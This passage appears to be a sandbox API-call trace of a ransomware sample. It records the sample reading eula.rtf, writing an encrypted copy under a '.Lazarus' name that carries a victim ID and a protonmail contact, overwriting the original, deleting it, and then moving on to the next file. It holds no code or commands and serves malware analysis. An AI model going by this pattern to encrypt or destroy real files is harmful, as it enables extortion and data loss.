InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.385] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.385] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0066.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.385] AreFileApisANSI () returned 1 [0066.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1036\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1036\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0066.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0066.385] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.385] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0066.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0066.385] AreFileApisANSI () returned 1 [0066.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69210 [0066.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 36 [0066.385] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.385] GetFileType (hFile=0x420) returned 0x1 [0066.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0066.385] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0066.386] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0066.386] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0066.386] CloseHandle (hObject=0x420) returned 1 [0066.386] AreFileApisANSI () returned 1 [0066.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69350 [0066.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 36 [0066.386] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.386] GetFileType (hFile=0x420) returned 0x1 [0066.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0066.386] CloseHandle (hObject=0x420) returned 1 [0066.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.387] AreFileApisANSI () returned 1 [0066.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0066.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 36 [0066.387] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6)) returned 1 [0066.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0066.387] AreFileApisANSI () returned 1 [0066.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0066.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0066.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0066.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0066.388] GetLastError () returned 0x0 [0066.388] SetLastError (dwErrCode=0x0) [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3e8 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8a210 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0066.388] GetLastError () returned 0x0 [0066.388] SetLastError (dwErrCode=0x0) [0066.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68d60 [0066.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0066.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0066.388] AreFileApisANSI () returned 1 [0066.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0066.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0066.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0066.388] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.545] GetFileType (hFile=0x420) returned 0x1 [0066.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0066.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0066.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0066.546] AreFileApisANSI () returned 1 [0066.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b80 [0066.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 36 [0066.546] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.546] GetFileType (hFile=0x428) returned 0x1 [0066.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0066.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a630 [0066.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0066.547] GetLastError () returned 0x0 [0066.547] SetLastError (dwErrCode=0x0) [0066.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0066.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.547] GetLastError () returned 0x0 [0066.547] SetLastError (dwErrCode=0x0) [0066.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0066.547] ReadFile (in: hFile=0x428, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0xdc6, lpOverlapped=0x0) returned 1 [0066.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0066.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0066.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0066.549] GetLastError () returned 0x0 [0066.549] SetLastError (dwErrCode=0x0) [0066.549] GetLastError () returned 0x0 [0066.549] SetLastError (dwErrCode=0x0) [0066.549] GetLastError () returned 0x0 [0066.549] SetLastError (dwErrCode=0x0) [0066.549] ReadFile (in: hFile=0x428, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0066.549] GetLastError () returned 0x0 [0066.549] SetLastError (dwErrCode=0x0) [0066.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cfb0 [0066.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0066.549] GetLastError () returned 0x0 [0066.549] SetLastError (dwErrCode=0x0) [0066.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0066.549] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327ef70*=0xdd0, lpOverlapped=0x0) returned 1 [0066.550] GetLastError () returned 0x0 [0066.550] SetLastError (dwErrCode=0x0) [0066.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0066.551] GetLastError () returned 0x0 [0066.551] SetLastError (dwErrCode=0x0) [0066.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0066.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0066.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0066.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.551] CloseHandle (hObject=0x420) returned 1 [0066.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0066.552] CloseHandle (hObject=0x428) returned 1 [0066.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0066.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0066.552] AreFileApisANSI () returned 1 [0066.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0066.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 36 [0066.552] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.553] GetFileType (hFile=0x428) returned 0x1 [0066.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0066.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0066.553] GetLastError () returned 0xb7 [0066.553] SetLastError (dwErrCode=0xb7) [0066.554] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0066.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0066.554] CloseHandle (hObject=0x428) returned 1 [0066.555] AreFileApisANSI () returned 1 [0066.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0066.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 36 [0066.555] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf")) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0066.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.556] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0066.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0066.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0066.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0066.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0066.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0066.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0066.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0066.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.557] InitOnceExecuteOnce (in: 